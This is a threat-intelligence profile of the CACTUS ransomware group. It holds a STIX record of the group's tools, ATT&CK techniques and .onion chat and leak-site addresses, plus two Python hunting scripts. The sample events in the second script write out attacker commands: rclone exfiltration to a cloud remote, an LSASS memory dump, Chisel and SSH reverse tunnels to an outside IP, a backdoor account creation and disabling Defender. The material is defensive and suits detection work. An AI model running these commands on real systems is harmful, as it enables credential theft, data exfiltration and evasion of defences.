Threat Actor Profile
Description
The CACTUS ransomware group is reported to have emerged around March 2023. It became known for exploiting vulnerabilities to gain initial access and to keep a foothold inside the victim organization's infrastructure. Little else is publicly documented about the group beyond that date and its post-encryption artifacts: a ransom note named 'cAcTuS.readme.txt' is written to disk, encrypted files are renamed with the '.cts1' extension, and data exfiltration and victim extortion are conducted through the service known as Tox. Source: https://github.com/crocodyli/ThreatActors-TTPs
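The two on-disk indicators the profile gives ('.cts1' renames and the 'cAcTuS.readme.txt' ransom note) are easy to hunt for, but a single '.cts1' file in an analyst's sample folder should not page anyone. The script below, an added example that is not code from the profile or its source, correlates the two indicators per host with a sliding time window and only raises severity when a rename burst and a note coincide. The input is a constructed JSON-lines file-event feed with assumed field names (ts, host, event, path); map your Sysmon Event ID 11 or EDR fields onto it.

```python
"""Correlate CACTUS encryption artifacts ('.cts1' renames, ransom note) per host.

Added example, not from the original profile. Field names ts/host/event/path
are assumptions; the sample log is constructed, not real telemetry.
"""
import json
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterable, List

RANSOM_NOTE = "cactus.readme.txt"   # compared case-insensitively on the basename
ENCRYPTED_EXT = ".cts1"


def _basename(path: str) -> str:
    """Lower-cased basename that tolerates both Windows and POSIX separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_events(lines: Iterable[str]) -> List[dict]:
    """Parse JSON-lines file events; malformed lines are skipped, not fatal."""
    events = []
    for line in lines:
        try:
            rec = json.loads(line)
            rec["ts"] = datetime.fromisoformat(rec["ts"])
            events.append(rec)
        except (ValueError, KeyError, TypeError):
            continue
    return events


def _max_in_window(times: List[datetime], window: timedelta) -> int:
    """Largest number of sorted timestamps that fall inside any single window."""
    best = start = 0
    for end in range(len(times)):
        while times[end] - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def detect_cactus_encryption(lines, window=timedelta(minutes=5), min_renames=20) -> Dict[str, dict]:
    """Return {host: finding}. 'high' = rename burst plus ransom note,
    'medium' = burst only, 'low' = note only; hosts with neither are omitted."""
    by_host: Dict[str, List[dict]] = defaultdict(list)
    for ev in parse_events(lines):
        by_host[ev["host"]].append(ev)
    findings = {}
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e["ts"])
        renames = [e["ts"] for e in evs
                   if e.get("event") in ("rename", "create")
                   and e["path"].lower().endswith(ENCRYPTED_EXT)]
        notes = [e for e in evs if _basename(e["path"]) == RANSOM_NOTE]
        burst = _max_in_window(renames, window)
        if burst >= min_renames and notes:
            severity = "high"
        elif burst >= min_renames:
            severity = "medium"
        elif notes:
            severity = "low"
        else:
            continue
        first = min(renames + [n["ts"] for n in notes], default=None)
        findings[host] = {"severity": severity, "renames_in_window": burst,
                          "ransom_notes": len(notes),
                          "first_seen": first.isoformat() if first else None}
    return findings


def _sample_log() -> List[str]:
    """Constructed sample: WS01 is a real burst, WS02 one stray analyst sample,
    WS03 a ransom note with no renames, plus one malformed line."""
    t0 = datetime(2024, 1, 15, 3, 0, 0)
    rows = [{"ts": (t0 + timedelta(seconds=3 * i)).isoformat(), "host": "WS01", "event": "rename",
             "path": f"C:\\Users\\finance\\Documents\\q3_{i}.xlsx{ENCRYPTED_EXT}"} for i in range(25)]
    rows.append({"ts": (t0 + timedelta(seconds=80)).isoformat(), "host": "WS01", "event": "create",
                 "path": "C:\\Users\\finance\\Documents\\cAcTuS.readme.txt"})
    rows.append({"ts": t0.isoformat(), "host": "WS02", "event": "create",
                 "path": "/home/analyst/samples/sample.bin.cts1"})
    rows.append({"ts": t0.isoformat(), "host": "WS03", "event": "create",
                 "path": "D:\\share\\cAcTuS.readme.txt"})
    return [json.dumps(r) for r in rows] + ["not json at all"]


SAMPLE_LOG = _sample_log()

if __name__ == "__main__":
    for host, finding in sorted(detect_cactus_encryption(SAMPLE_LOG).items()):
        print(host, finding)
```

The window and threshold are tunable: a file server being encrypted over SMB will show hundreds of renames per minute, while a single '.cts1' hit with no note is left at no finding so that stored samples do not generate alerts.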
Confidence Score
Tags
First Seen
Unknown
Last Updated
Unknown
Active Status
Active
Created
April 29, 2026
MITRE ATT&CK Techniques (20)
STIX Data
{'added_date': None,
'client': '2003264@sit.singaporetech.edu.sg',
'description': 'The CACTUS ransomware is said to have emerged around March '
'2023. The group became known for exploiting vulnerabilities '
'to gain initial access and maintain a presence within the '
"organization's infrastructure.<br> <br> There is little known "
'information about the ransomware group, except that it '
'emerged on the mentioned date and, following encryption, a '
"text file named 'cAcTuS.readme.txt' would be created. "
"Additionally, encrypted files were altered to the '.cts1' "
'extension, and data exfiltration and victim extortion were '
'conducted through the use of the service known as '
'Tox.<br>Source: '
'https://github.com/crocodyli/ThreatActors-TTPs',
'firstseen': '2023-07-03T00:00:00+00:00',
'group': 'cactus',
'has_negotiations': False,
'has_ransomnote': True,
'lastseen': '2025-03-17T09:28:12.446000+00:00',
'locations': [{'available': True,
'fqdn': 'sonarmsng5vzwqezlvtu2iiwwdn3dxkhotftikhowpfjuzg7p3ca5eid.onion',
'slug': 'http://sonarmsng5vzwqezlvtu2iiwwdn3dxkhotftikhowpfjuzg7p3ca5eid.onion/contact/Cactus_Support',
'title': 'Sonar - Encrypted communications',
'type': 'Chat'},
{'available': False,
'fqdn': 'cactusbloguuodvqjmnzlwetjlpj6aggc6iocwhuupb47laukux7ckid.onion',
'slug': 'https://cactusbloguuodvqjmnzlwetjlpj6aggc6iocwhuupb47laukux7ckid.onion',
'title': '500: Internal Server Error',
'type': 'DLS'},
{'available': False,
'fqdn': 'cactus5dqnqkppa5ayckiyk6dttpqwczdqphv5mxh4dkk5ct544q5aad.onion',
'slug': 'https://cactus5dqnqkppa5ayckiyk6dttpqwczdqphv5mxh4dkk5ct544q5aad.onion',
'title': '',
'type': 'DLS'}],
'negotiation_count': 0,
'ransomnotes_count': 6,
'tiaras_metadata': {'has_negotiations': False,
'has_ransomnote': True,
'locations': [{'available': True,
'fqdn': 'sonarmsng5vzwqezlvtu2iiwwdn3dxkhotftikhowpfjuzg7p3ca5eid.onion',
'slug': 'http://sonarmsng5vzwqezlvtu2iiwwdn3dxkhotftikhowpfjuzg7p3ca5eid.onion/contact/Cactus_Support',
'title': 'Sonar - Encrypted communications',
'type': 'Chat'},
{'available': False,
'fqdn': 'cactusbloguuodvqjmnzlwetjlpj6aggc6iocwhuupb47laukux7ckid.onion',
'slug': 'https://cactusbloguuodvqjmnzlwetjlpj6aggc6iocwhuupb47laukux7ckid.onion',
'title': '500: Internal Server Error',
'type': 'DLS'},
{'available': False,
'fqdn': 'cactus5dqnqkppa5ayckiyk6dttpqwczdqphv5mxh4dkk5ct544q5aad.onion',
'slug': 'https://cactus5dqnqkppa5ayckiyk6dttpqwczdqphv5mxh4dkk5ct544q5aad.onion',
'title': '',
'type': 'DLS'}],
'negotiation_count': 0,
'ransomnotes_count': 6,
'ransomware_live_group': 'cactus',
'tools': {'CredentialTheft': [],
'DefenseEvasion': [],
'DiscoveryEnum': ['Nmap', 'SoftPerfect NetScan'],
'Exfiltration': ['RClone'],
'LOLBAS': [],
'Networking': ['Chisel'],
'Offsec': ['Cobalt Strike'],
'RMM-Tools': ['AnyDesk',
'Splashtop',
'SuperOps']},
'url': 'https://www.ransomware.live/group/cactus',
'victims': 248,
'vulnerabilities': []},
'tiaras_source': 'ransomware.live',
'tools': {'CredentialTheft': [],
'DefenseEvasion': [],
'DiscoveryEnum': ['Nmap', 'SoftPerfect NetScan'],
'Exfiltration': ['RClone'],
'LOLBAS': [],
'Networking': ['Chisel'],
'Offsec': ['Cobalt Strike'],
'RMM-Tools': ['AnyDesk', 'Splashtop', 'SuperOps']},
'ttps': [{'tactic_id': 'TA0042',
'tactic_name': 'Resource Development',
'techniques': [{'technique_details': 'Microsoft attributed a '
'Danabot malvertising campaign '
'that culminated in delivery of '
'Cactus ransomware to this '
'threat actor.',
'technique_id': 'T1583.008',
'technique_name': 'Acquire Infrastructure: '
'Malvertising'}]},
{'tactic_id': 'TA0001',
'tactic_name': 'Initial Access',
'techniques': [{'technique_details': 'The group exploits '
'vulnerabilities in VPN '
'applications.',
'technique_id': 'T1190',
'technique_name': 'Exploit Public-Facing '
'Application'}]},
{'tactic_id': 'TA0002',
'tactic_name': 'Execution',
'techniques': [{'technique_details': 'The group uses scheduled '
'tasks to execute files for C2 '
'communication and to persist '
'the ransomware payload.',
'technique_id': 'T1053.005',
'technique_name': 'Scheduled Task/Job: Scheduled '
'Task'},
{'technique_details': 'Actors gain access to '
'third-party software '
'deployment tools installed on '
'the network and use them for '
'lateral movement.',
'technique_id': 'T1072',
'technique_name': 'Software Deployment Tools'}]},
{'tactic_id': 'TA0007',
'tactic_name': 'Discovery',
'techniques': [{'technique_details': 'Actors use tools to scan the '
"organization's infrastructure "
'systems.',
'technique_id': 'T1049',
'technique_name': 'System Network Connections '
'Discovery'},
{'technique_details': 'Actors use scripts to '
'identify domain accounts of '
'connected users through '
'Windows event logs.',
'technique_id': 'T1087.002',
'technique_name': 'Account Discovery: Domain '
'Account'},
{'technique_details': 'Actors attempt to obtain a '
'list of other systems, hosts, '
'IPs, and any other identifier '
'for lateral movement.',
'technique_id': 'T1018',
'technique_name': 'Remote System Discovery'},
{'technique_details': 'Actors attempt to obtain a '
'list of accounts, user names, '
'and valid email addresses for '
'later access.',
'technique_id': 'T1087',
'technique_name': 'Account Discovery'}]},
{'tactic_id': 'TA0011',
'tactic_name': 'Command and Control',
'techniques': [{'technique_details': 'Actors use legitimate remote '
'access software (the RMM tools '
'listed above) to reach other '
'devices on the internal '
'network.',
'technique_id': 'T1219',
'technique_name': 'Remote Access Software'},
{'technique_details': 'Actors use connection proxy '
'to route network traffic '
'between systems to avoid '
'detection by security '
'solutions.',
'technique_id': 'T1090',
'technique_name': 'Proxy'}]},
{'tactic_id': 'TA0005',
'tactic_name': 'Defense Evasion',
'techniques': [{'technique_details': 'The group uses modification '
'and disabling of security '
'tools to avoid possible '
'malware and access detection.',
'technique_id': 'T1562.001',
'technique_name': 'Disable or Modify Tools'},
{'technique_details': 'The group uses file '
'obfuscation techniques to '
'avoid detection by defenses.',
'technique_id': 'T1027',
'technique_name': 'Obfuscated Files or Information'},
{'technique_details': 'Actors use packing in '
'ransomware payload to avoid '
'detection by defenses.',
'technique_id': 'T1027.002',
'technique_name': 'Obfuscated Files or Information: '
'Software Packing'}]},
{'tactic_id': 'TA0003',
'tactic_name': 'Persistence',
'techniques': [{'technique_details': 'The group creates a '
'service/system account to '
'launch the ransomware.',
'technique_id': 'T1136',
'technique_name': 'Create Account'}]},
{'tactic_id': 'TA0006',
'tactic_name': 'Credential Access',
'techniques': [{'technique_details': 'The group searches for key '
"files from users' browsers to "
'locate stored passwords to '
'proceed with the attack and '
'access other accounts.',
'technique_id': 'T1555.003',
'technique_name': 'Credentials from Web Browsers'},
{'technique_details': 'The group performs LSASS '
'memory dumps to harvest '
'credentials.',
'technique_id': 'T1003.001',
'technique_name': 'OS Credential Dumping: LSASS '
'Memory'}]},
{'tactic_id': 'TA0008',
'tactic_name': 'Lateral Movement',
'techniques': [{'technique_details': 'After gaining initial '
'access, the group sets up an '
'SSH tunnel to its C2 server.',
'technique_id': 'T1021.004',
'technique_name': 'Remote Services: SSH'},
{'technique_details': 'Cactus actors use valid '
'accounts to log into devices '
'via RDP.',
'technique_id': 'T1021.001',
'technique_name': 'Remote Services: Remote Desktop '
'Protocol'},
{'technique_details': 'Actors transfer tools and '
'other files between systems '
'to stage and run the '
'encryption.',
'technique_id': 'T1570',
'technique_name': 'Lateral Tool Transfer'}]},
{'tactic_id': 'TA0010',
'tactic_name': 'Exfiltration',
'techniques': [{'technique_details': 'Actors exfiltrate data to a '
'cloud storage service through '
'tools such as Rclone and '
'others.',
'technique_id': 'T1567.002',
'technique_name': 'Exfiltration to Cloud Storage'}]},
{'tactic_id': 'TA0040',
'tactic_name': 'Impact',
'techniques': [{'technique_details': 'Actors use ransomware payload '
'to encrypt data and change '
'extensions.',
'technique_id': 'T1486',
'technique_name': 'Data Encrypted for Impact'}]}],
'url': 'https://www.ransomware.live/group/cactus',
'victims': 248,
'vulnerabilities': []}
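The 'ttps' and 'tools' entries above are the useful part of this record for a responder: each technique, and each named tool (Rclone, Chisel, AnyDesk/Splashtop/SuperOps, Nmap and SoftPerfect NetScan), has a recognisable shape in process-creation telemetry. The script below is an added example, not code from the profile, ransomware.live or any vendor; it keys one rule per technique ID listed above and runs them over a constructed set of process-creation events with assumed field names (host, user, image, cmdline). Binary names for the RMM and scanner tools are assumptions, and because the rules key on command lines, renamed binaries slip past the image checks, the standard caveat for command-line hunting.

```python
"""Hunt the CACTUS techniques listed in the profile in process-creation events.

Added example, not from the original profile. Event fields host/user/image/
cmdline are assumptions (map Sysmon Event ID 1 or your EDR onto them); the
RMM and scanner binary names are assumptions; SAMPLE_EVENTS is constructed.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Callable, Dict, List


@dataclass(frozen=True)
class Rule:
    technique_id: str
    name: str
    match: Callable[[dict], bool]   # receives {"img", "cl" (lower-cased), "raw"}


def _base(path: str) -> str:
    """Lower-cased basename that tolerates both path separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


# rclone remotes look like 'mega:dump'; requiring two-plus chars before ':' and
# no following slash keeps Windows drive letters (c:\...) from matching.
_RCLONE_REMOTE = re.compile(r"\s[a-z][\w-]+:(?![\\/])")
# ssh forwarding flags are case-sensitive (-l is the login option, -L a local
# forward), so this pattern runs on the raw, un-lowered command line.
_SSH_TUNNEL = re.compile(r"(?:^|\s)-[A-Za-z]*[RLDN]\b")

RULES: List[Rule] = [
    Rule("T1053.005", "Scheduled Task",
         lambda ev: ev["img"] == "schtasks.exe" and "/create" in ev["cl"]),
    Rule("T1567.002", "Exfiltration to Cloud Storage (Rclone)",
         lambda ev: "rclone" in ev["img"]
         and re.search(r"\b(copy|sync|move)\b", ev["cl"]) is not None
         and _RCLONE_REMOTE.search(ev["cl"]) is not None),
    Rule("T1003.001", "OS Credential Dumping: LSASS Memory",
         lambda ev: ("procdump" in ev["img"] and "lsass" in ev["cl"])
         or ("comsvcs.dll" in ev["cl"] and "minidump" in ev["cl"])),
    Rule("T1219", "Remote Access Software (RMM)",   # vendor name in image: assumption
         lambda ev: any(v in ev["img"] for v in ("anydesk", "splashtop", "superops"))),
    Rule("T1090", "Proxy (Chisel reverse tunnel)",
         lambda ev: "chisel" in ev["img"] and " client " in ev["cl"] and " r:" in ev["cl"]),
    Rule("T1021.004", "Remote Services: SSH (tunnel to C2)",
         lambda ev: ev["img"] in ("ssh.exe", "ssh") and _SSH_TUNNEL.search(ev["raw"]) is not None),
    Rule("T1136", "Create Account",
         lambda ev: ev["img"] in ("net.exe", "net1.exe") and " user " in ev["cl"] and "/add" in ev["cl"]),
    Rule("T1562.001", "Impair Defenses: Disable or Modify Tools",
         lambda ev: "set-mppreference" in ev["cl"] and "-disablerealtimemonitoring" in ev["cl"]),
    Rule("T1018", "Remote System Discovery (Nmap / SoftPerfect NetScan)",   # binary names: assumption
         lambda ev: ev["img"] in ("nmap.exe", "nmap", "netscan.exe", "netscan64.exe")),
]


def hunt(events: List[dict]) -> Dict[str, List[dict]]:
    """Return {technique_id: [hit, ...]}; each hit keeps host, user and the raw command line."""
    hits: Dict[str, List[dict]] = defaultdict(list)
    for e in events:
        raw = e.get("cmdline", "")
        ev = {"img": _base(e.get("image", "")), "cl": raw.lower(), "raw": raw}
        for rule in RULES:
            if rule.match(ev):
                hits[rule.technique_id].append(
                    {"host": e["host"], "user": e.get("user"), "rule": rule.name, "cmdline": raw})
    return dict(hits)


def techniques_seen(events: List[dict]) -> List[str]:
    """Sorted technique IDs observed; diff against the profile's list to scope the intrusion."""
    return sorted(hunt(events))


# Constructed sample telemetry (not real): one event per technique, two benign.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\jdoe", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /tn "Updater" /tr "C:\ProgramData\svc.exe" /sc minute /mo 5 /ru SYSTEM'},
    {"host": "FS01", "user": "CORP\\svc_backup", "image": r"C:\ProgramData\rclone.exe",
     "cmdline": r'rclone.exe copy "D:\Finance" mega:dump --transfers 32'},
    {"host": "DC01", "user": "CORP\\admin", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 744 C:\Temp\l.dmp full"},
    {"host": "WS07", "user": "CORP\\jdoe", "image": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe",
     "cmdline": r'"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service'},
    {"host": "JMP01", "user": "CORP\\admin", "image": r"C:\Temp\chisel.exe",
     "cmdline": "chisel.exe client 203.0.113.10:8080 R:0.0.0.0:1080:socks"},
    {"host": "JMP01", "user": "CORP\\admin", "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": "ssh.exe -N -R 2222:127.0.0.1:3389 ops@203.0.113.10"},
    {"host": "DC01", "user": "CORP\\admin", "image": r"C:\Windows\System32\net.exe",
     "cmdline": "net user svc_backup Winter2024! /add"},
    {"host": "WS01", "user": "CORP\\jdoe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"host": "WS01", "user": "CORP\\jdoe", "image": r"C:\Temp\netscan.exe",
     "cmdline": "netscan.exe /range:10.0.0.1-10.0.255.254"},
    {"host": "WS02", "user": "CORP\\ops", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": "schtasks.exe /query /fo LIST"},
    {"host": "WS02", "user": "CORP\\ops", "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": "ssh.exe -l admin bastion.corp.local"},
]

if __name__ == "__main__":
    for tid, rows in hunt(SAMPLE_EVENTS).items():
        for r in rows:
            print(f"{tid:<10} {r['host']:<6} {r['rule']}: {r['cmdline']}")
```

Run against real telemetry, the hosts that stack several of these technique IDs (here WS01, DC01 and JMP01) are where a responder should pull full timelines first; the benign WS02 events show why the SSH rule keeps case (a login `-l` is not a `-L` forward) and why `schtasks /query` is not treated like `/create`.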